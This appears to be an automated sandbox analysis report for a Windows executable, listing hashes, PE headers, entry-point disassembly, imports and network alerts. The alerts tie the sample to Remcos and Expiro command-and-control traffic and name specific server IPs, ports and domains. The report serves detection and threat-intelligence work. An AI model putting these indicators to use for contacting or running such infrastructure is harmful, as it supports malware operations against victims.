                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:....X...X.......................................X...!.....................................Dx....................eJ..............Zb..............................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1..............................................................O............<..............H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...C.:.\.W.i.n.d.o.w.s.\.T.e.m.p.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.H.o.l.o.g.r.a.p.h.i.c.S.h.e.l.l...e.t.l.......P.P...........Dx............................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.874408377679067
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:tyRPPK48Mk.exe
File size:3'101'805 bytes
MD5:94a2b51672c9fb20b8bc7ebfcbf648c0
SHA1:b6bf724c582f4467fb4d87108744cafbdbd1169b
SHA256:35a056cc53702fd3c3d9f0624eadae17b0e00ac7f18ffd50b6a708cc27183441
SHA512:6dd9869686dfb6003a974e2130df1843e0fc78d31a8a246a6685192140d47b06a85483c47c4df01c56fad1d0eae8669e0b1befc47912446073e411fc16f079ed
SSDEEP:49152:7JZoQrbTFZY1iaCt55r1KX4wtxCliwzlGWm4FjNLlX1USl6G5tCaOOplYEawVubA:7trbTA1YKowvCrzkWm4Z3Ffl6+C8pXao
TLSH:72E51221F9C68036C2F267B09EBFF759963D66360336D19B27C82D351EA05417B2A723
                                                                                                                                                                                                                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
Icon Hash:1733312925935517
Entrypoint:0x4165c1
Entrypoint Section:.text
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
                                                                                                                                                                                                                                                                                                                                                                                                                              Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
Instruction
call 00007F1CF869D53Bh
jmp 00007F1CF86943AEh
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F1CF869452Ah
cmp edi, eax
jc 00007F1CF86946C6h
cmp ecx, 00000080h
jc 00007F1CF869453Eh
cmp dword ptr [004A9724h], 00000000h
je 00007F1CF8694535h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F1CF8694527h
jmp 00007F1CF8694902h
test edi, 00000003h
jne 00007F1CF8694536h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F1CF869454Bh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F1CF869452Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F1CFAB0CD27h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F1CF86944EEh
rep movsd
jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock,
GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                                                                                                                                                                                                                                                                                                                                                                                                                              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, 
SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                                                                                                                                                                                                                                                                                                                                                                                                                              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                                                                                                                                                                                                                                                                                                                                                                                                                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                                                                                                                                                                                                                                                                              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                                                                                                                                                                                                                                                                                                                                                                                                                              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                                                                                                                                                                                                                                                                                              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                                                                                                                                                                                                                                                                                                                                                                                                                              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:47.380482+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449845204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660540+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.449872TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660540+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.449872TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:50.660648+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449871204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:51.300193+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.449883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:51.300193+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.449883TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:53.318018+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449891204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:55.811449+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449912204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:28:58.303982+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449933204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.779947+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449956204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.825835+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.449963TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.825835+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.449963TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.949795+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.213.104.8680192.168.2.449966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:00.949795+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.213.104.8680192.168.2.449966TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:03.288853+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449978204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:04.863924+02002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.44999818.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:05.808726+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.449997204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:08.282216+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450016204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:10.750660+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450037204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:13.218937+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450059204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:15.709046+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450077204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:18.210532+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450096204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.709019+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450115204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.912788+02002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.450123TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:20.912788+02002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.450123TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:23.140948+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450136204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:25.582997+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450143204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:27.146473+02002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.4601551.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:28.241267+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450148204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:30.615404+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450153204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:32.958174+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450157204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:35.268925+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450162204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:37.586267+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450168204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:39.730141+02002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.4556841.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:39.902521+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450175204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:42.113325+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450181204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:44.300850+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450187204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:44.367043+02002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.4581041.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:46.494672+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450192204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:48.650001+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450198204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:50.469266+02002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.4539391.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:51.137660+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450201204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:53.345689+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450205204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:55.457123+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450209204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:57.548989+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450215204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:29:59.621390+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450218204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:01.698073+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450221204.10.160.2126622TCP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:02.236163+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4492651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:02.257670+02002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.4492651.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                              2024-10-08T15:30:03.705202+02002036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection1192.168.2.450226204.10.160.2126622TCP
